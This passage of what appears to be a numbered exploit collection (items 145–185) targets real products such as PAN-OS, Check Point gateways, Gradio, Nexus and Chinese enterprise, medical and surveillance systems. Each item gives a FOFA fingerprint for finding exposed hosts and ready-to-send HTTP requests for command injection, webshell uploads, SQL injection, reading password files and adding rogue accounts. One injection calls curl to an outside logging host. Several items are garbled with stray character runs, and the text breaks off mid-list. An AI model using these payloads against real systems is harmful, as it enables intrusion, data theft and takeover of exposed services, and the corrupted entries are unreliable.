GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura-CMS-processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传7 v4 L0 |* S- Q! |" o
FOFA: title="智慧综合管理平台登入"
- J+ [6 u- s: R1 bPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
: }1 U. w2 O  d2 N3 g! NHost: x.x.x.x
; q" o/ }* h* z8 N, LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' i' V5 N8 u7 l+ C2 C% N# @0 Q
Content-Length: 288
* g0 q: E+ x' I! p6 TAccept: application/json, text/javascript, */*; q=0.01  F( S  A' s$ J: s  v& w- G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,: y* D% s6 r; f* y! [# v! K& c
Connection: close
8 O: B7 U! ]4 k1 QContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; s0 H, d" \8 [  j7 GX-Requested-With: XMLHttpRequest- J) o- T/ t( z: O/ x2 d
Accept-Encoding: gzip
2 v4 z+ b" R$ q7 v( k: Q% [8 ^5 d1 z/ D9 C
------dqdaieopnozbkapjacdbdthlvtlyl1 E* i7 }+ @- T7 i6 z6 p) `8 n
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"7 \7 _& x  g& L3 J( @& G; o
Content-Type: image/jpeg
; ^) S; y/ {. c" u4 C: \$ }$ i. @: J( E8 x, _5 A
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>) Z7 Z6 c8 R  V2 }. C) t
------dqdaieopnozbkapjacdbdthlvtlyl--
; W  H* B+ Q7 x# g; `0 j
8 \6 b) c7 N4 V; k! F: m  f& O! @1 k% m) Y2 U! h
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
7 ], S, |+ r6 a4 h! W4 e7 w
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

" h7 _8 U8 k3 u5 \& y: G175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入7 ~; b. r  m9 ^4 r3 Z* u/ e
FOFA:app="金和网络-金和OA"
/ y. J4 m* [9 u* D+ ?- t' {GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1# ]3 o$ U: w/ C3 f4 {. k; m; t
Host:; A; R$ v8 a; B% `
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- p: h! F2 P" e# f5 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# [: ?% l! b  m6 `: _7 f  }$ y" _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% h' I1 k+ g0 u# {4 a+ N
Accept-Encoding: gzip, deflate4 s, Q! k) o6 ]% f0 k" L! F
Connection: close
* |! D$ i" i+ r. zUpgrade-Insecure-Requests: 14 v, p$ ?+ L& y
$ h' y* C8 v% n( l* s
& u: h, l4 ?/ Y& f. W8 y
176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

- h# ^. [  _8 |* e179. 建文工程管理系统存在任意文件读取* L* m$ Q1 p7 v8 n$ @+ G' W
POST /Common/DownLoad2.aspx HTTP/1.1
% ~. Q# ?9 w; F' y% Z/ PHost: {{Hostname}}
& E9 ~- r1 i5 S6 |2 `. _& Y. TContent-Type: application/x-www-form-urlencoded. Z, l" R+ p: L$ ]
User-Agent: Mozilla/5.0
/ k* r  e9 v3 U- [1 M2 m1 c( l9 U* J' B9 }& i2 _
path=../log4net.config&Name=
4 j. S; H. H2 I+ S- T- ~7 c" \1 _
+ u$ r3 v! g# Z+ A( J
180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
